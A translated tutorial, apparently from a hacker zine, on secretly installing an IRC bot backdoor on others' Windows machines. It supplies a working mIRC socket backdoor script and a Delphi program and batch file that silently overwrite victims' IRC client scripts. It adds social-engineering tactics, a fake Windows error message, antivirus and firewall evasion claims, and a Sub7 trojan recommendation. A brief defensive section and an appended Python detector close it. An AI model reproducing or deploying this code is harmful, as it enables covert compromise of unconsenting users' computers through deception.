
Hanging a bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. Writing our own script backdoor
II. Writing a Delphi program that inserts the backdoor into the victim's mIRC
III. Writing a batch program that inserts the backdoor into the victim's mIRC
IV. Social engineering: foisting the program on them =)
4. Both methods compared.
5. How to protect yourself.
6. Outro.

1. Nowadays it has become fashionable among the owners of popular channels to hang dozens of bots from various Linux shells on their channels to ensure, so to speak, "channel security". Of course, I have nothing against eggdrops, but what about simple mortal users who have neither a shell, nor ss, nor the knowledge (like, for example, the elite from channel #31337 on the irc.dal.net.ru server =)? So in this article I will tell you how to hang a bot on a machine running a Windows-type OS.
IMHO there are only two ways to do this: trojans and trojans =) Let's start with the first.

2. If you were on msn (irc.msn.com) before it closed, you probably got to enjoy any number of bots on the channels #russian_chat, #russian_girls, #russian_andybig and so on. Those bots were far from eggdrops. They were, so to speak, SubSevens. Heard of that Trojan horse? Sub7 is the only trojan I remember that let you remotely hang an IRC bot (I haven't used trojans for a long time, so I don't know whether it has any analogues). So download Sub7 from here and enjoy. Those who aren't used to taking the easy way can read on.

3. The possibilities of mIRC scripts are very impressive. Writing something like a CGI scanner in them is a trivial matter, never mind a simple bot. Take the WarSatan script, for example. Just such a "simple bot" is built into it. When you connect to your favorite IRC server, the script simultaneously connects a guest user to the irc.webchat.org server and leads it onto the channels #CHATOP, #MEKAH and #PANGKOR. That is the whole mechanism. Our task is to write the same kind of simple backdoor in the form of an mIRC plugin.
I. I will comment on the most important lines.

on 1:CONNECT:{
  ;# open a connection to your IRC server
  .sockopen 31337 irc_server its_port
}
on 1:DISCONNECT:{
  ;# when the connection drops, kill the socket
  .sockclose 31337
}
on 1:SOCKOPEN:31337:{
  ;# register with the IRC server
  .sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
  .sockwrite -n $sockname NICK bot_nick $+ $r(1,999)
  ;# join your channel
  .sockwrite -n $sockname join your_channel
}
on 1:SOCKREAD:31337:{
  ;# this handler automatically answers the server's PING
  ;# without it the server will drop the bot for not answering pings
  .sockread %tmp
  if ($gettok(%tmp,1,32) == ping) {
    .sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
  }
}


Remove the comments, substitute your own values, number the lines (just paste it all into the mIRC editor and save; it numbers everything itself) and save the result as a file named control.dll.
The backdoor itself is ready. Now all that remains is to insert it into someone else's script.ini.

II. Here is the source of a Delphi program that searches the hard drive for script.ini and, if the search succeeds, replaces it with ours.

Important! control.dll must be kept in the same directory as this program.

program Project1;

uses
  SysUtils,
  windows,
  shellapi;

const search = 'script.ini';  // the file to find and replace
      replace = 'control.dll'; // the file to replace it with; must be
                               // in the same place this program is run from =)

var buf: array [0..255] of char;
    fl: PChar;
    flag: boolean = false;

// file replacement procedure
procedure Change(where: pchar);

  function CopyFile(FromFile, ToDir: string): boolean; // copy function
  var F: TShFileOpStruct;
  begin
    F.Wnd := 0; F.wFunc := FO_COPY;
    FromFile := FromFile + #0; F.pFrom := pchar(FromFile);
    ToDir := ToDir + #0; F.pTo := pchar(ToDir);
    F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
    {$I-}
    result := ShFileOperation(F) = 0;
    {$I+}
  end;

begin
  DeleteFile(where);
  CopyFile(replace, where)
end;

// global search procedure
function Find(DirN: string): boolean;
var
  tsr: TSearchRec;
  Full: string;

begin
  find := false;
  if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
    repeat
      if (tsr.Name = '.') or (tsr.Name = '..') then continue;
      Full := DirN + '\' + tsr.Name;
      if tsr.Attr = faDirectory then // if it is a directory
        Find(Full);
    until (FindNext(tsr) <> 0) or (tsr.Name = search) or flag;

  if tsr.Name = search // if found
  then begin
    find := true;
    flag := true;
    Change(pchar(DirN + '\' + tsr.Name));
  end;

end;

// Main program block
begin
  if SearchPath(nil, search, nil, sizeof(buf), buf, fl) > 0 then
    Change(buf)
  else
  begin
    Find('c:');
    // if you need to search other drives too, you can do it like this:
    // if Not Find('c:') then
    // if Not Find('d:') then
    // if Not Find('e:') then
    // etc....
  end;

end.


III. If you haven't done any coding since birth and the word "compiler" gives you the shivers, let's write the same program as a batch file.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

This contraption searches for mIRC, NeoRa Trion and LookSharp by blindly guessing paths. The chance of a hit is fairly low, so it is better to trick the subject into putting this file together with control.dll in the same directory as their IRC client. If the search succeeds, the file replaces the other person's script.ini with our control.dll.
Convert this .bat into an .exe with some bat2exec and you can foist it on your friends.

IV. I don't think I need to tell you how to foist an .exe on someone. I just want to emphasize one feature. Admit it, a request to run your .exe will raise suspicion even in the dimmest user. So you can go another way. Go back to point I. Do NOT number the lines of the script, just put it in a file called joke.mrc. That's it. Now hand it out to your friends with the words: put it in your mIRC directory, type "/load -rs joke.mrc" in the console and enjoy all the delights of the plugin =)

4. So why is replacing script.ini the better way?
1) antiviruses don't catch it
2) firewalls don't catch it. I think many will immediately start proving, foaming at the mouth, that ZoneAlarm and AtGuard protect them from this. Specially for them I explain: if mIRC is registered in these two firewalls as an allowed server/client, the firewall won't even pop up when the backdoor opens its connection.
3) it is hard to detect / kill even for an experienced user

5. Now about how to defend yourself. Again, I won't consider the Sub7 method (everything is clear there: AVP + ZoneAlarm), I'll go straight to the second one.
To detect a script backdoor, use some mIRC plugin like IPSearch, which searches the server for a user with the same IP as yours. If there is one, someone has definitely hung a bot on you. If none is found, either the bot is on another server or you're clean.
The same ZoneAlarm can also be used to detect a bot: these days the biggest IRC servers check all connecting clients for open proxies. How? A simple port scan. So if you connect to the server irc.some.com and some irc.lame.com scans your ports, it's worth thinking about...
How to kill a backdoor? If you don't understand scripting, just reinstall the IRC client.
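As an added defensive example (not part of the original article), here is a small Python checker that scans a mIRC script.ini (numbered nN= format) or .mrc file for the pattern described in section 3: a raw sockopen followed by IRC registration commands (USER/NICK/JOIN) written over that socket, which a normal mIRC script has no reason to do. The sample inputs are constructed and the hostname is a placeholder.

```python
import re

# Constructed sample: a script.ini in mIRC's numbered [script] format,
# modelled on the backdoor skeleton in section 3 with placeholder values.
SAMPLE_SCRIPT_INI = """[script]
n0=on 1:CONNECT:{
n1=  .sockopen 31337 irc.example.invalid 6667
n2=}
n3=on 1:SOCKOPEN:31337:{
n4=  .sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
n5=  .sockwrite -n $sockname NICK bot $+ $r(1,999)
n6=  .sockwrite -n $sockname join #somechannel
n7=}
"""

# Constructed benign script: joins a channel through mIRC's own connection.
BENIGN_MRC = """on 1:CONNECT:{
  echo -a Connected, joining home channel
  join #home
}
"""

# A socket opened by the script itself: name, host, port.
SOCKOPEN = re.compile(r'sockopen\s+(\S+)\s+(\S+)\s+(\d+)', re.I)
# IRC registration sent over a raw socket instead of via the client.
IRC_REG = re.compile(r'sockwrite\b.*\b(NICK|USER|JOIN)\b', re.I)

def script_lines(text):
    """Yield script lines from a numbered script.ini ('nN=...') or a plain .mrc."""
    for raw in text.splitlines():
        m = re.match(r'^n\d+=(.*)$', raw.strip())
        yield (m.group(1) if m else raw).strip()

def find_bot_indicators(text):
    """Return (line number, kind, detail) for each suspicious line."""
    findings = []
    for n, line in enumerate(script_lines(text), 1):
        m = SOCKOPEN.search(line)
        if m:
            findings.append((n, 'sockopen', f'{m.group(2)}:{m.group(3)} as {m.group(1)}'))
        m = IRC_REG.search(line)
        if m:
            findings.append((n, 'irc-over-socket', m.group(1).upper()))
    return findings

def is_suspicious(text):
    """Flag only scripts that both open a socket and speak IRC over one."""
    kinds = {kind for _, kind, _ in find_bot_indicators(text)}
    return 'sockopen' in kinds and 'irc-over-socket' in kinds
```

Run it over every script.ini and .mrc under the mIRC directory; a hit tells you which line opens the hidden connection and where it goes.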

6. What can be said in conclusion? Don't use unfamiliar scripts, and don't force others to =)